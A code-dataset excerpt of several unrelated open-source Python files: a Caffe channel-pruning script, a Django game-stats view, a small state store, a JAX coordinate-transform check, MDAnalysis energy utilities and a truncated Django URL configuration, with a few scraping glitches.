=model_def.split(\".\")\nfw, tw = model_weights.split(\".\")\n\nmodel_lr_def = f+'_lr.'+t\nmodel_lr_weights = fw+'_lr.'+tw\n\nmodel_cp_def = f+'_lr_cp.' 
+t\nmodel_cp_weights = fw+'_lr_cp.'+tw\n\nif 0:\n print('lr_def =',model_lr_def)\n print('lr_weights =',model_lr_weights)\n print('channel def = ', model_cp_def)\n print('channel weights =', model_cp_weights)\n\nconf = load_config('D:/CodeBook/Python/lowrankcnn/imagenet/models_vgg/config.json')\nprune_names = [name+'_h' for name in conf if name!='conv5_3'] # don`t remove con5_3\n\n# store cratio every layer\nconf_cratio = load_config('D:/CodeBook/Python/lowrankcnn/imagenet/models_vgg/config_cratio.json')\n#cratios=[conf_cratio[x[:-2]] for x in prune_names]\n# Low Rank Decomposes\nif 1:\n make_lowrank_model(model_def, conf, model_lr_def)\n \n approx_lowrank_weights(model_def, model_weights, conf, model_lr_def,\n model_lr_weights)\n\nprint('Low Rank Done')\n\n\n#bottom_layer_name =\"pool1\" # (1, 64, 112, 112) # we will channel prune on this layer ,So we change num_output on this layer\n# conv1_2_h - > relu -> pool so prune channel of conv1_2_h layer\n#top_layer_name = \"conv2_1_v\" # (1, 48 ,224, 224)\n#prune_layer_name = \"conv1_2_h\"\n\ncfg=dict()\ncfg['nPointsPerLayer'] = 10\ncfg['nBatch'] = 500\ncfg['c_ratio'] = 0.869\ncfg['alpha'] = 1e-3\nN = cfg['nBatch'] * cfg['nPointsPerLayer']\n\n\nfor prune_layer_name in prune_names:\n cfg['c_ratio'] = conf_cratio[prune_layer_name[:-2]] # c_ratio\n\n lr_net = caffe.Net(model_lr_def , model_lr_weights, caffe.TEST)\n convs_name = lr_net._blob_names\n#if prune_layer_name=='conv1_2_h':\n print(\"-----------------------------------------\")\n print(\" Start channel prune :\", prune_layer_name, 'C_ratio = ',cfg['c_ratio'])\n print('------------------------------------------')\n\n bottom_layer_name, top_layer_name = extract_layer_name(lr_net, prune_layer_name)\n\n params = get_layer_params(model_lr_def, top_layer_name)\n print('layer params :', params)\n cfg['params']= params #(pad_h, pad_w, k_h, k_w)\n pad_h, pad_w, k_h, k_w = params\n\n samples =np.random.randint(0, N, 250)\n \n X, w2, b2 ,Y, c_in, c_out = extract_feat(prune_layer_name, cfg, lr_net)\n reX = np.rollaxis(X.reshape((N,c_in, -1))[samples], 1, 0) #(64, 250 , 3*3)\n reW2 = np.transpose(w2.reshape((c_out, c_in, -1)),[1, 2, 0])\n\n reY = Y[samples].reshape(-1)\n Z =np.matmul(reX, reW2).reshape((c_in, -1)).T\n #Z = relu(Z)\n\n _solver = Lasso(alpha=1e-4, warm_start=True,selection='random' )\n def solve(alpha):\n _solver.alpha=alpha\n _solver.fit(Z, reY)\n \n idxs = _solver.coef_ != 0\n tmp = sum(idxs)\n if 1:print('Lasso score is ',_solver.score(Z,reY),end='\\t')\n return idxs, tmp\n\n left = 0\n right = cfg['alpha']\n lbound = int(c_in * cfg['c_ratio']) # 64 * 0.869 ~ 55\n rank = lbound\n rbound = 1.1*lbound\n\n while True:\n _, tmp =solve(right)\n\n if tmp rbound:\n left =alpha\n elif tmp < lbound:\n right = alpha\n else:\n break\n\n if 1:print(prune_layer_name+\" - check again: rank is \",tmp)\n rank = tmp\n\n newW2, newB2 = fc_kernel(X[:, idxs, ...].reshape((N,-1)), Y, W=w2[:, idxs, ...].reshape(c_out, -1), B=b2)\n newW2= newW2.reshape((c_out, rank, k_h, k_w))\n\n w2[:, ~idxs, ...]= 0\n w2[:, idxs, ...]=newW2.copy()\n\n newWeight2 = w2[:, idxs, ...] 
# (48, 55 , 3 ,1)\n if 1: \n res = rel_error(X.reshape(X.shape[0],-1).dot(w2.reshape(w2.shape[0],-1).T),Y)\n print(\"After Lasso, rMSE =\", res)\n res_relu = rel_error(relu(X.reshape(X.shape[0],-1).dot(w2.reshape(w2.shape[0],-1).T)),Y)\n print('After Lasso, rMSE-relu =', res_relu)\n \n \"\"\"generator new protobuf\"\"\"\n make_channel_pruning_model(model_lr_def, model_cp_def, prune_layer_name, rank) # (64) -> 55\n\n \"\"\"generator new weights\"\"\"\n channel_net = caffe.Net(model_cp_def, caffe.TEST)\n for layer_name, param in channel_net.params.items(): \n if layer_name == prune_layer_name:\n orig_w , orig_b = [p.data for p in lr_net.params[layer_name]]\n param[0].data[...] = orig_w[idxs,...].copy()\n param[1].data[...] = orig_b[idxs,...].copy()\n elif layer_name == top_layer_name:\n param[0].data[...] = newWeight2.copy()\n param[1].data[...] = b2.reshape(param[1].data.shape).copy()\n else:\n orig_w , orig_b = [p.data for p in lr_net.params[layer_name]]\n new_w , new_b = param[0].data, param[1].data\n new_w[...]=orig_w.copy()\n new_b[...]=orig_b.copy()\n \n channel_net.save(model_cp_weights)\n print(prune_layer_name)\n\n model_lr_def = model_cp_def\n model_lr_weights = model_cp_weights\n\nprint('Low -Rank and Channel Pruning Done!!')\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ReProduceByYQ/Channel_pruning_yq","sub_path":"low_rank_and_channel_pruning.py","file_name":"low_rank_and_channel_pruning.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"13657553153","text":"from django.shortcuts import render\nfrom .services.summoner_data import SummonerData\nfrom .utils import get_game_type\nimport os\nfrom django.conf import settings\n\ndef home(request):\n return render(request, 'summoner_dashboard/main_page.html')\n\n\ndef summoner_info(request, summoner_name):\n api_key = settings.API_KEY\n \n summoner = SummonerData(summoner_name, api_key)\n summoner_data = summoner.league_data()\n recent_matches_data = summoner.recent_matches_data()\n top_champs_data = summoner.top_champions_data()\n role_data = summoner.role_data()\n \n \n summoner_data = {\n \"summoner_name\": summoner_name,\n \"profile_icon_id\": summoner_data[\"profile_icon_id\"],\n \"summoner_level\": summoner_data[\"summoner_level\"],\n \"soloq\": {\n \"rank\": summoner_data[\"soloq_rank\"].title(),\n \"lp\": summoner_data[\"soloq_lp\"],\n \"wins\": summoner_data[\"soloq_wins\"],\n \"losses\": summoner_data[\"soloq_losses\"],\n \"wr\": summoner_data[\"soloq_wr\"],\n },\n \"flex\": {\n \"rank\": summoner_data[\"flex_rank\"].title(),\n \"lp\": summoner_data[\"flex_lp\"],\n \"wins\": summoner_data[\"flex_wins\"],\n \"losses\": summoner_data[\"flex_losses\"],\n \"wr\": summoner_data[\"flex_wr\"],\n },\n }\n champions_played = [\n {\n \"champion_name\": champ[\"champion_name\"],\n \"cs\": champ[\"cs\"],\n \"kda\": round(champ[\"kda\"], 2),\n \"kills\": champ[\"kills\"],\n \"deaths\": champ[\"deaths\"],\n \"assists\": champ[\"assists\"],\n \"wr\": round(champ[\"wr\"]),\n \"games_played\": champ[\"matches_played\"],\n }\n for champ in top_champs_data\n ]\n \n recent_matches = [\n {\n \"game_type\": get_game_type(match[\"queue_id\"]),\n \"game_mode\": match[\"game_mode\"],\n \"queue_id\": match[\"queue_id\"],\n \"game_duration\": match[\"game_duration\"],\n \"win\": match[\"win\"],\n \"champion_name\": match[\"champion_name\"],\n \"item_ids\": [\n match[\"item0\"], \n match[\"item1\"], \n match[\"item2\"], \n 
match[\"item3\"], \n match[\"item4\"], \n match[\"item5\"], \n match[\"item6\"]\n ],\n \"summoner_spell_ids\": [\n match[\"summoner_spell1\"], \n match[\"summoner_spell2\"]],\n \"kills\": int(match[\"kills\"]),\n \"deaths\": int(match[\"deaths\"]),\n \"assists\": int(match[\"assists\"]),\n \"kda_ratio\": round((int(match[\"kills\"]) + int(match[\"assists\"])) / int(match[\"deaths\"]), 2) if int(match[\"deaths\"]) > 0 else round((int(match[\"kills\"]) + int(match[\"assists\"])), 2),\n \"cs\": match[\"cs\"],\n \"vision\": match[\"vision\"],\n \"participant_summoner_names\": [match[\"participant1_summoner_name\"], match[\"participant2_summoner_name\"], match[\"participant3_summoner_name\"], match[\"participant4_summoner_name\"], match[\"participant5_summoner_name\"], match[\"participant6_summoner_name\"], match[\"participant7_summoner_name\"], match[\"participant8_summoner_name\"], match[\"participant9_summoner_name\"], match[\"participant10_summoner_name\"]],\n \"participant_champion_names\": [match[\"participant1_champion_name\"], match[\"participant2_champion_name\"], match[\"participant3_champion_name\"], match[\"participant4_champion_name\"], match[\"participant5_champion_name\"], match[\"participant6_champion_name\"], match[\"participant7_champion_name\"], match[\"participant8_champion_name\"], match[\"participant9_champion_name\"], match[\"participant10_champion_name\"]\n ],\n }\n for match in recent_matches_data\n ]\n\n\n summoner_profile = {\n 'summoner_name': summoner_name,\n 'summoner_data': summoner_data,\n 'champions_played': champions_played,\n 'recent_matches': recent_matches,\n 'role_data': role_data,\n }\n \n \n return render(request, 'summoner_dashboard/summoner_page.html', summoner_profile)","repo_name":"Diegowh/whgg","sub_path":"summoner_dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16393856122","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom builtins import open\nfrom builtins import int\nfrom builtins import range\nfrom future import standard_library\nfrom configparser import ConfigParser\nimport numpy as np\nfrom MDAnalysis.lib.NeighborSearch import AtomNeighborSearch\nfrom math import pi\nimport datetime\nimport MDAnalysis\nimport multiprocessing\nimport os\nimport pkg_resources\nstandard_library.install_aliases()\n\n\ndef vdw_energy(atom1, atom2, box_dimensions):\n \"\"\"Calculate van der Waals energy.\n Parameters\n ----------\n atom1: MDAnalysis.core.groups.Atom\n First atom\n atom2: MDAnalysis.core.groups.Atom\n Second atom\n box_dimensions: numpy.ndarray\n Dimensions of the system box (for PBC imaging)\n\n Returns\n -------\n evdw : float\n Van der Waals energy in kJ/mol\n \"\"\"\n\n mixed_lj_term = np.sqrt(atom1.lj_energy*atom2.lj_energy)\n vdw_eq_radius = np.sqrt(atom1.vdw_radius*atom2.vdw_radius)\n r = MDAnalysis.lib.distances.calc_bonds(atom1.position.reshape(-1, 3),\n atom2.position.reshape(-1, 3), box_dimensions)[0]\n evdw = 4.184 * mixed_lj_term * (np.power(vdw_eq_radius/r, 12) - 2*np.power(vdw_eq_radius/r, 6)) # standard 12-6 Lennard-Jones form, converted from kcal to kJ/mol\n return evdw\n\n\ndef check_params(settings, filename='config.ini'):\n \"\"\"Check validity of the parameters in the config.ini file.\n Parameters\n ----------\n settings: ConfigParser\n Object containing data located in config.ini\n filename: str\n Name of the config file\n \"\"\"\n 
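# A config.ini of roughly the following shape is assumed by this checker\n # (the section and key names are the ones read below; the values are purely\n # illustrative, not taken from the original project):\n #\n # [files]\n # topology = system.prmtop\n # trajectories = run1.nc, run2.nc\n # filetype = NCDF\n #\n # [parameters]\n # mask1 = resid 1-100\n # mask2 = resid 101-200\n # cutoff = 5\n # stride = 10\n # dt = 1\n # ncores = 4\n # vdw = True\n 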
error_message = ''\n topology = settings.get('files', 'topology')\n trajectories = settings.get('files', 'trajectories').split(', ')\n extension = settings.get('files', 'filetype')\n mask1 = settings.get('parameters', 'mask1')\n mask2 = settings.get('parameters', 'mask2')\n cutoff = settings.get('parameters', 'cutoff')\n calculate_vdw = load_from_config('parameters', 'vdw')[0] == 'True'\n\n try:\n stride = int(load_from_config('parameters', 'stride', filename)[0])\n except ValueError:\n error_message = 'Stride must be an integer!'\n\n try:\n dt = int(load_from_config('parameters', 'dt', filename)[0])\n except ValueError:\n error_message = 'Timestep must be an integer!'\n\n try:\n ncores = int(load_from_config('parameters', 'ncores', filename)[0])\n except ValueError:\n error_message = 'Number of cores must be an integer!'\n\n try:\n whole_traj = MDAnalysis.Universe(topology)\n except (KeyError, ValueError) as error:\n error_message = 'Topology parsing error! (If you are sure everything is in order' \\\n ' try converting to another format)'\n except getattr(__builtins__,'FileNotFoundError', IOError):\n error_message = 'Topology file missing!'\n number_frames_total = 0\n\n if error_message == '':\n for trajectory in trajectories:\n try:\n system = MDAnalysis.Universe(topology, format=extension)\n number_frames_trajectory = len(system.trajectory)\n number_frames_total += number_frames_trajectory\n except ValueError:\n try:\n system = MDAnalysis.Universe(topology, trajectory, format=extension)\n number_frames_trajectory = len(system.trajectory)\n number_frames_total += number_frames_trajectory\n except getattr(__builtins__, 'FileNotFoundError', IOError):\n error_message = 'One or more files missing!'\n except (KeyError, ValueError) as error:\n error_message = 'Topology/trajectory error or filetype mismatch!'\n\n if error_message == '':\n if ncores > multiprocessing.cpu_count():\n error_message = 'Number of cores specified higher than available number of cores (%s)'\\\n % multiprocessing.cpu_count()\n elif ncores > (number_frames_total // stride) + 1:\n error_message = 'Number of cores higher than number of frames!'\n\n if error_message == '':\n try:\n system.select_atoms(mask1)\n except (TypeError, KeyError, MDAnalysis.exceptions.SelectionError) as error:\n error_message = 'Mask1 error!'\n if error_message == '':\n try:\n system.select_atoms(mask2)\n except (TypeError, KeyError, MDAnalysis.exceptions.SelectionError) as error:\n error_message = 'Mask2 error!'\n\n if error_message == '':\n if len(system.select_atoms(mask1)) == 0:\n error_message = 'Mask1 contains no atoms!'\n if error_message == '':\n if len(system.select_atoms(mask2)) == 0:\n error_message = 'Mask2 contains no atoms!'\n if error_message == '':\n if cutoff != '':\n try:\n cutoff = float(cutoff)\n except ValueError:\n error_message = 'Cutoff must be a number!'\n if error_message == '' and calculate_vdw:\n try:\n system.atoms[0].element == 'a'\n except:\n error_message = 'Van der Waals interactions not supported for this format!'\n\n return error_message\n\n\ndef check_plot_params(settings, filename='config_plot.ini'):\n \"\"\"Check validity of the parameters in the config_plot.ini file.\n Parameters\n ----------\n settings: ConfigParser\n Object containing data located in config_plot.ini\n filename: str\n Filename of the config file containing plotting parameters\n \"\"\"\n error_message = ''\n datafile = settings.get('files', 'datafile')\n startframe = load_from_plot_config('parameters', 'startframe', filename)\n endframe = 
load_from_plot_config('parameters', 'endframe', filename)\n starting_residue = load_from_plot_config('parameters', 'starting_residue', filename)\n end_residue = load_from_plot_config('parameters', 'end_residue', filename)\n range_of_values = load_from_plot_config('parameters', 'range_of_values', filename)\n\n # Check filename\n try:\n with open(datafile, 'r+') as results:\n last_line = tail(results)\n except getattr(__builtins__, 'FileNotFoundError', IOError):\n error_message = 'File not found!'\n\n # Check datafile entry validity\n if error_message == '':\n try:\n final_datafile_frame = int(last_line[0].split()[0])\n last_datafile_residue = int(last_line[0].split()[1])\n except (ValueError, KeyError) as error:\n error_message = 'Datafile error!'\n\n # Check if parameters are integers\n\n try:\n startframe = int(startframe)\n except ValueError:\n error_message = 'Starting frame must be an integer!'\n\n try:\n endframe = int(endframe)\n except ValueError:\n error_message = 'Final frame must be an integer!'\n\n try:\n starting_residue = int(starting_residue)\n except ValueError:\n error_message = 'Starting residue must be an integer!'\n\n try:\n end_residue = int(end_residue)\n except ValueError:\n error_message = 'Final residue must be an integer!'\n\n if error_message == '':\n if startframe > endframe:\n error_message = 'Starting frame number higher than final frame!'\n\n if error_message == '':\n if startframe > final_datafile_frame:\n error_message = 'Starting frame larger than total number of frames (%d)' % final_datafile_frame\n elif starting_residue > last_datafile_residue:\n error_message = 'Starting residue larger than total number of residues (%d)' % last_datafile_residue\n\n if error_message == '':\n try:\n range_of_values = float(range_of_values)\n except ValueError:\n error_message = 'Range of values must be a number!'\n return error_message\n\n\ndef load_from_config(section, parameter, filename='config.ini'):\n \"\"\"Tries loading parameters from the config.ini file. Defaults to values defined in default_values if not found in\n config.ini.\n\n Parameters\n ----------\n section: str\n Section of the .ini file\n parameter: str\n Parameter as defined in the .ini file\n filename: str\n Name of the config file\n\n Returns\n -------\n A list containing either the parameter from the input file or a default value and a boolean telling whether\n or not a default value was used (important for logging).\n \"\"\"\n\n default_values = ConfigParser()\n config = ConfigParser()\n default_values.read(pkg_resources.resource_filename('relictoolkit', 'config_defaults.dft'))\n\n config.read(filename)\n\n try:\n if config.get(section, parameter) == '':\n return [default_values[parameter], True]\n else:\n return [config.get(section, parameter), False]\n except:\n return [default_values.get(section, parameter), True]\n\n\ndef load_from_plot_config(section, parameter, filename='config_plot.ini'):\n \"\"\"Tries loading parameters from the config_plot.ini file. 
Defaults to values defined in default_values if not\n found in config_load.ini.\n\n Parameters\n ----------\n section: str\n Section of the .ini file\n parameter: str\n Parameter as defined in the .ini file\n filename: str\n Name of the config file\n Returns\n -------\n A parameter read from the config file or a default value defined in default_values\n \"\"\"\n config = ConfigParser()\n config.read(filename)\n datafile = config.get('files', 'datafile')\n with open(datafile, 'r+') as results:\n last_line = tail(results)\n\n default_values = {\n 'interactive': 'True',\n 'plot_type': 'time',\n 'startframe': 0,\n 'endframe': int(last_line[0].split()[0]),\n 'starting_residue': 1,\n 'end_residue': int(last_line[0].split()[1]),\n 'dt': 1,\n 'range_of_values': 0\n }\n\n try:\n if config.get(section, parameter) == '':\n return default_values[parameter]\n else:\n return config.get(section, parameter)\n except:\n return default_values[parameter]\n\n\ndef load_partial_traj(input_system, step, ncores, core):\n \"\"\"Perform trajectory pre-processing: apply periodic boundary conditions and break into multiple files for parallel\n processing.\n\n Parameters\n ----------\n input_system : MDAnalysis.Universe\n A Universe object containing the input system data loaded from topology/trajectory files\n step: int\n Trajectory sampling interval\n ncores: int\n Number of CPU cores\n core: int\n current CPU core\n \"\"\"\n\n frames_per_traj = len(input_system.trajectory) // ncores\n\n # Overhead is used to avoid loading multiple frames within a single step due to the trajectory fragmenting\n # or improper fragmentation of the trajectory\n overhead = frames_per_traj - (frames_per_traj // step) * step\n overhead = overhead * core\n overhead = overhead % step\n endframe = (core + 1) * frames_per_traj\n if overhead == 0:\n overhead = step\n\n elif overhead == step:\n endframe += 1\n\n startingframe = (core*frames_per_traj) + (step-overhead)\n\n if core == ncores-1:\n endframe = len(input_system.trajectory)\n\n with open('relic_logfile.log', 'a+') as logfile:\n logfile.write('Core %s assigned frames %s to %s\\n' % (core, startingframe, endframe))\n\n partial_traj_info = {\n 'traj': input_system.trajectory[startingframe:endframe:step],\n 'startframe': startingframe,\n 'endframe': endframe\n }\n\n return partial_traj_info\n\n\ndef electrostatic_energy(atom1, atom2, box_dimensions):\n \"\"\"Calculate electrostatic interactios within a cutoff distance.\n\n Parameters\n ----------\n atom1: MDAnalysis.core.groups.Atom\n First atom\n atom2: MDAnalysis.core.groups.Atom\n Second atom\n box_dimensions: numpy.ndarray\n Dimensions of the system box (for PBC imaging)\n\n Returns\n -------\n eelec: float\n Electrostatic energy in kJ/mol.\n \"\"\"\n\n indiel = float(load_from_config('parameters', 'indi')[0])\n interatom_distance = MDAnalysis.lib.distances.calc_bonds(atom1.position.reshape(-1, 3),\n atom2.position.reshape(-1, 3), box=box_dimensions)[0]\n eelec = 1389 * (1/(4*pi*indiel))*(atom1.charge * atom2.charge) / interatom_distance # kJ/mol\n return eelec # converts to kJ/mol\n\n\ndef interdomain_interactions(domain1, domain2, frame_number):\n \"\"\"Calculate interactions between domain1 and domain2 present in the given frame\n\n Parameters\n ----------\n domain1: MDAnalysis.core.groups.AtomGroup\n Atoms comprising the first domain\n domain2: MDAnalysis.core.groups.AtomGroup\n Atoms comprising the second domain\n frame_number: int\n Frame number, numbering consistent with the original trajectory (for output)\n\n Returns\n 
-------\n domain_interactions: list\n List contaning frame number, residue number, electrostatic, van der Waals and total interaction energy. This\n list is subsequently printed to output.\n \"\"\"\n\n possible_neighbors = AtomNeighborSearch(domain2.select_atoms('not resname WAT', updating=True))\n domain_interactions = list()\n calculate_vdw = load_from_config('parameters', 'vdw')[0] == 'True'\n for residue in domain1.residues:\n if residue.resname != 'WAT' and residue.resname != 'SOL':\n neighbor_atoms = possible_neighbors.search(residue.atoms,\n float(load_from_config('parameters', 'cutoff')[0]), level='A')\n eelec = 0\n evdw = 0\n for residue_atom in residue.atoms:\n for neighbor_atom in neighbor_atoms:\n eelec += electrostatic_energy(residue_atom, neighbor_atom, domain1.dimensions)\n if calculate_vdw:\n evdw += vdw_energy(residue_atom, neighbor_atom, domain1.dimensions)\n domain_interactions.append('{:<10d} {:<10d} {:>10.5f} {:>10.5f} {:>10.5f}'.format(\n frame_number, residue.resid, eelec, evdw, eelec+evdw))\n return domain_interactions\n\n\ndef process_frame(domain1, domain2, output, frame_number):\n \"\"\"Calculate interactions for a single frame, sort by residue and print them to output.\n\n Parameters\n ----------\n domain1: MDAnalysis.core.groups.AtomGroup\n Atoms comprising the first domain\n domain2: MDAnalysis.core.groups.AtomGroup\n Atoms comprising the second domain\n output: TextIO\n Filename of the output file\n frame_number: int\n Frame number, numbering consistent with the original trajectory (for output)\n \"\"\"\n\n frame_unsorted = list()\n interactions_domain1 = interdomain_interactions(domain1, domain2, frame_number)\n interactions_domain2 = interdomain_interactions(domain2, domain1, frame_number)\n frame_unsorted += interactions_domain1\n frame_unsorted += interactions_domain2\n for entry in sorted(frame_unsorted, key=lambda row: int(row.split()[1])):\n print(entry, file=output)\n\n\ndef read_uff_parameters():\n \"\"\"Read LJ parameters from the UFF database. 
Based on Rappe et al., 1992.\n\n Returns\n -------\n parameters: dict\n Dictionary containing LJ parameters for every atom.\n \"\"\"\n\n parameters = {}\n with open(pkg_resources.resource_filename('relictoolkit', 'uff.parm')) as uff_parameters:\n for line in uff_parameters:\n (key, val) = (line.split()[0], line.split()[1:3])\n try:\n val = [float(val[i]) for i in range(0, len(val))]\n parameters[key] = val\n except ValueError:\n pass\n return parameters\n\n\ndef write_logfile_header(settings, logfile):\n \"\"\"Print the calculation start time and given input to the header of the logfile.\n Parameters\n ----------\n settings: ConfigParser\n Object containing data located in config.ini\n logfile: FileIO\n .log file\"\"\"\n\n logfile.write('Calculation started at %s\\n\\n' % datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\"))\n logfile.write('-' * 15 + 'Input overview' + '-' * 15 + '\\n')\n logfile.write('{:<17s}{:<80}\\n'.format('Topology:', settings.get('files', 'topology')))\n trajectory_list = settings.get('files', 'trajectories').split(', ')\n logfile.write('Trajectories:\\n')\n for name in trajectory_list:\n logfile.write('{:<17s}{:<80s}\\n'.format('', name))\n logfile.write('Data written to: %s\\n' % load_from_config('files', 'output')[0])\n logfile.write('Mask1: %s\\nMask2: %s\\n' % (settings.get('parameters', 'mask1'), settings.get('parameters', 'mask2')))\n\n strideinfo = load_from_config('parameters', 'stride')\n if not strideinfo[1]:\n logfile.write('Stride: %s\\n' % int(strideinfo[0]))\n else:\n logfile.write('Stride not specified; a default value of %s used instead\\n'\n % int(strideinfo[0]))\n\n indiinfo = load_from_config('parameters', 'indi')\n if not indiinfo[1]:\n logfile.write('Internal dielectric constant: %s\\n' % indiinfo[0])\n else:\n logfile.write('Internal dielectric constant not specified; using a default value of %s\\n' % indiinfo[0])\n\n vdwinfo = load_from_config('parameters', 'vdw')\n if not vdwinfo[1]:\n if vdwinfo[0]:\n logfile.write('Van der Waals interactions will not be calculated\\n')\n else:\n logfile.write('Van der Waals interactions will be calculated\\n')\n else:\n logfile.write('Treatment of van der Waals interactions not specified; will not calculate\\n')\n\n procinfo = load_from_config('parameters', 'ncores')\n if not procinfo[1]:\n logfile.write('Using %s CPU cores...\\n' % procinfo[0])\n else:\n logfile.write('Number of cores not specified; using %s core\\n' % procinfo[0])\n\n logfile.write('-' * 44 + '\\n\\n')\n\n\ndef tail(f, lines=1, _buffer=4098):\n \"\"\"Tail a file and get X lines from the end\n Taken from:\n https://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail/7047765#7047765\n\n Parameters\n ----------\n f : fileI/O\n file containing the output\n lines : integer\n number of lines to get\n _buffer : integer\n chunk size\n\n Returns\n -------\n Selected number of lines from the end of the file\n \"\"\"\n # place holder for the lines found\n lines_found = []\n\n # block counter will be multiplied by buffer\n # to get the block size from the end\n block_counter = -1\n\n # loop until we find X lines\n while len(lines_found) < lines:\n try:\n f.seek(block_counter * _buffer, os.SEEK_END)\n except IOError: # either file is too small, or too many lines requested\n f.seek(0)\n lines_found = f.readlines()\n break\n\n lines_found = f.readlines()\n\n # we found enough lines, get out\n # Removed this line because it was redundant the while will catch\n # it, I left it for history\n # if len(lines_found) > 
lines:\n # break\n\n # decrement the block counter to get the\n # next X bytes\n block_counter -= 1\n\n return lines_found[-lines:]\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mtomin/relictoolkit","sub_path":"relictoolkit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40977811911","text":"# mypy: ignore-errors\n\nfrom typing import Any, Callable\n\nfrom box import Box\n\nfrom hooks import create_context, set_context_value, use_context\n\nStateSelector = Callable[[Any], Any]\nSetTyping = Callable[[StateSelector], None]\nGetTyping = Callable[[], Box]\n\n\nclass ZustandStore:\n def __init__(\n self,\n store_initial_state: dict[str, Any],\n store_config: Callable[[SetTyping, GetTyping], Any],\n ):\n self.state_context = create_context(store_initial_state)\n self.config_context = create_context({})\n\n def setter(state_selector: StateSelector) -> None:\n set_context_value(\n self.state_context,\n state_selector(use_context(self.state_context)),\n )\n\n def getter() -> Box:\n return Box(\n {**use_context(self.state_context), **use_context(self.config_context)}\n )\n\n self.setter = setter\n self.getter = getter\n set_context_value(\n self.config_context,\n store_config(self.setter, self.getter),\n )\n\n def __call__(self, selector: StateSelector) -> Any:\n return selector(self.getter())\n\n\ndef create(\n store_initial_state: dict[str, Any],\n store_config: Callable[[SetTyping, GetTyping], Any],\n) -> ZustandStore:\n \"\"\" \"\"\"\n return ZustandStore(store_initial_state, store_config)\n","repo_name":"amitassaraf/python-hooks","sub_path":"src/hooks/plugins/zustand.py","file_name":"zustand.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"37"} +{"seq_id":"38169882411","text":"import chex\nimport jax.numpy as jnp\nimport jax.random\n\n\ndef x0_centered_to_zero_CoM(x: chex.Array) -> chex.Array:\n n = x.shape[0] + 1\n return x - jnp.sum(x, axis=0, keepdims=True) / n\n\ndef zero_CoM_to_x0_centered(x: chex.Array):\n x0_coordinate = -jnp.sum(x, axis=0, keepdims=True)\n return x - x0_coordinate\n\n\nif __name__ == '__main__':\n key = jax.random.PRNGKey(0)\n n_nodes = 8\n dim = 3\n x_0_centered = jax.random.normal(key, (n_nodes - 1, dim))\n x_zeroCom = x0_centered_to_zero_CoM(x_0_centered)\n x0_in_zeroCom = - jnp.sum(x_zeroCom, axis=0)\n\n x_0_centered_ = zero_CoM_to_x0_centered(x_zeroCom)\n\n chex.assert_trees_all_close(x_0_centered, x_0_centered_, atol=1e-6)\n\n jac = jax.jacfwd(x0_centered_to_zero_CoM)(x_0_centered)\n\n assert (jac[:, 1, :, 0] == 0).all()\n\n A = jnp.eye(n_nodes-1)\n u = 1 / n_nodes * jnp.ones(n_nodes-1)\n v = jnp.ones(n_nodes-1)\n u = u[:, None]\n v = v[:, None]\n expected_jac_dim_0 = A - u @ v.T\n\n\n chex.assert_trees_all_close(expected_jac_dim_0, jac[:, 0, :, 0])\n\n sign, log_det = jnp.linalg.slogdet(jac[:, 0, :, 0])\n\n expected_log_det_dim_0 = - jnp.log(n_nodes)\n\n log_det_ovall = - dim * jnp.log(n_nodes)\n","repo_name":"lollcat/se3-augmented-coupling-flows","sub_path":"eacf/utils/coordinate_transform/atom0centre_to_ZeroCoM_log_det.py","file_name":"atom0centre_to_ZeroCoM_log_det.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"38883765364","text":"from django.conf.urls import url\nfrom django.urls import 
include, path\n\nfrom .views import *\nfrom django.contrib.auth import views as auth_views\nfrom django.views.decorators.csrf import csrf_exempt\n\nurlpatterns=[\n    #url(),\n    url(r'^loguear',login,name='login'),\n#    url(r'^registrar',registrar_usuario,name='registre'),\n    url(r'^pruebas',prueba_html,name='pruebas'),\n    url(r'^retornar$',retornar,name='retornar'),\n    url(r'^listar_persona$',listar_persona,name='listar_persona'),\n    url(r'^crear_personas$',crear_personas,name='crear_personas'),\n    url(r'^crear_docentes$',crear_docente,name='crear_docentes'),\n    url(r'^cargar_materia',cargar_materias,name='materia'), #how a url is registered\n    url(r'^cargar_grado',cargar_grados,name='grado'),\n    url(r'^cargar_periodo',cargar_periodo,name='periodo'),\n    url(r'^cargar_lectivo', cargar_lectivo, name='lectivo'),\n    url(r'^cargar_period_mater', cargar_periodo_materia, name='periodo_materia'),\n    url(r'^listar_periodo',listar_periodo, name='list_period'),\n    url(r'^listar_grado',listar_grado, name='list_grad'),\n    url(r'^listar_materia',listar_materia, name='list_mater'),\n    url(r'^listar_lectivo',listar_lectivo, name='list_lectiv'),\n    url(r'^listar_period_mater',listar_periodo_materia, name='list_period_mater'),\n    url(r'^actualizar_periodo/(?P\\d+)$',periodo_actualizar, name ='actual_period'),\n    url(r'^actualizar_lectivo/(?P\\d+)$', lectivo_actualizar, name='actual_lectiv'),\n    url(r'^actualizar_grado/(?P\\d+)$',grado_actualizar, name ='actual_grad'),\n    url(r'^actualizar_materia/(?P\\d+)$',materia_actualizar, name ='actual_mater'),\n    url(r'^actualizar_period_mater/(?P\\d+)$',periodo_materia_actualizar, name ='actual_period_mater'),\n    url(r'^eliminar_periodo/(?P\\d+)$',eliminar_periodo, name ='eliminar_period'),\n    url(r'^eliminar_lectivo/(?P\\d+)$',eliminar_lectivo, name ='eliminar_lectiv'),\n    url(r'^eliminar_materia/(?P\\d+)$',eliminar_materia, name ='eliminar_mater'),\n    url(r'^eliminar_grado/(?P\\d+)$',eliminar_grado, name ='eliminar_grad'),\n    